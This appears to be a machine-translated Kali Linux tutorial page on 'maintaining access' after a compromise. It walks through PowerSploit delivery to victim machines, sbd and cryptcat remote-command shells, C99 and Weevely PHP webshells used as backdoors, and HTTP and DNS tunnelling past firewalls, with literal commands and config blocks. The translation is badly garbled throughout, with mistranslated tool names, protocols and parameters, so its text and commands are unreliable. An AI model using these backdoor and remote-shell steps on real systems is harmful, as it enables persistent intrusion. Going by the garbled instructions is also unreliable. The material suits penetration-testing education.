- Kali Linux - Reporting Tools
- Kali Linux - Reverse Engineering
- Kali Linux - Maintaining Access
- Kali Linux - Password Cracking Tools
- Kali Linux - Sniffing & Spoofing
- Kali Linux - Stressing Tools
- Kali Linux - Social Engineering
- Kali Linux - Forensics Tools
- Kali Linux - Exploitation Tools
- Website Penetration Testing
- Kali Linux - Wireless Attacks
- Vulnerability Analyses Tools
- Information Gathering Tools
- Installation & Configuration
- Kali Linux - Home
Kali Linux Useful Resources
Selected Reading
- Who is Who
- Computer Glossary
- HR Interview Questions
- Effective Resume Writing
- Questions and Answers
- UPSC IAS Exams Notes
Kap Linux - Maintaining Access
在本章中,我们将看到加里用于维持连接和进入破碎机器的工具,即使它再次连接和脱节。
Powersploit
这是一个用于Windows机器的工具。 它安装在受害人机器上。 这一工具帮助黑客通过PowerShell与受害者机器连接。
开放,在左边打开终点站,并打造以下指挥系统,以进入权力分管——
cd /usr/share/powersploit/
如果是“ls” 这份清单将列出在你获得访问后你能够下载和安装受害人机器的所有权力开发工具。 其中大多数是按姓名自行解释的。
在受害者机器上下载这一工具的一个容易的方法是建立一个网络服务器,该服务器授权使用各种工具,便于使用以下指挥系统:
python -m SimpleHTTPServer
之后,如果是:http://<Kap organ ip_address>:8000/以下是结果。
Sbd
s是一种类似于Netcat的工具。 该软件是可携带的,可以用于六氯环己烷和微软机器。 缩略语 基本上,它有助于在某个港口随时与受害人的机器连接,并远程发送指挥。
开放到终端站和“sbd -l-pport”,供服务器接受连接。
在这种情况下,让我们把44号港口放在服务器将倾听的地方。
在受害人的现场,“sbd IPofserver port”。 将建立连接,使我们能够派遣遥控指挥部。
在这种情况下,它是“当地人”,因为我们对同一机器进行了测试。
最后,在服务器上,你会看到,接线已经发生,如以下屏幕所示。
Webshells
可通过网站浏览或浏览。 但是,大多数检测到的是抗病毒。 C99 php壳在抗病毒中广为人知。 任何共同的抗病毒都很容易被检测为一种mal。
一般来说,其主要职能是通过网络接口发送系统指挥。
>>>在终点站开放。
如你所知,根据编程语言,他们分班:p , aspx, cfm, jsp, perl,php
如果你进入PHP的夹,你就可以看到网站的所有网址。
如“简单门槛”:php 开放网页和电子版。
最终写上三重指挥。 您将具备以下屏幕显示的所有信息。
Weevely
韦利是PHP网壳,模拟类似电话的连接。 它是网络应用后开发的工具,可以用作偷窃的后门或网吧,管理合法网站账户,甚至免费的主机。
开放,进入终点站和“全身”类型,看看其使用情况。
为产生弹壳,“立即产生密码径流”。 如以下屏幕所示,该软件在“台站”夹上生成,文档将上载到一个网络服务器上,以便上网。
在上载以下屏幕显示的网壳后,我们可以使用指挥“韦ly URL密码”与服务器连接。 你可以看到,会议已经开始。
http-tunnel
http-tunnel生成一条双向虚拟数据流,在吉大港山区应用方案的要求中 tunnel。 如果有此愿望,可以通过吉大港山区替代物发出这些请求。 这对限制性防火墙的使用者是有益的。 如果允许WWWWW通过吉大港警察局的代理进入,那么它就能够使用http-tunnel和电话或PP与防火墙外的计算机连接。
第一,我们应当建立一个隧道服务器,其指挥如下:
httptunnel_server –h
然后,在客户网站类型“httptunnel_cpent-h”上,双方将开始接受连接。
dns2tcp
这再次成为一条隧道工具,有助于通过国家航天中心交通,即UDP 53港口。
开始,“dns2tcpd”>。 当你将打开文字时,就对使用作了解释。
在服务器站,进入这一指挥系统,没收档案。
#cat >>.dns2tcpdrc <&l;END psten = 0.0.0.0 port = 53 user=nobody chroot = /root/dns2tcp pid_file = /var/run/dns2tcp.pid domain = your domain key = secretkey resources = ssh:127.0.0.1:22 END #dns2tcpd -f .dns2tcpdrc
在客户所在地,进入这一指挥部。
# cat >>.dns2tcprc <<END domain = your domain resource = ssh local_port = 7891 key = secretkey END # dns2tcpc -f .dns2tcprc # ssh root@localhost -p 7891 -D 7076
隧道工程将从这一指挥部开始。
cryptcat
它是另一个工具,如Netcat,使TCP和UDP能够以加密方式与受害人机器连接。
a. 开办一个服务器,听取联系,类型如下:
cryptcat –l –p port –n
如果有,
<-p 港口号参数表
在客户所在地,连接指挥部为“密码IPofServer PortofServer”。
Advertisements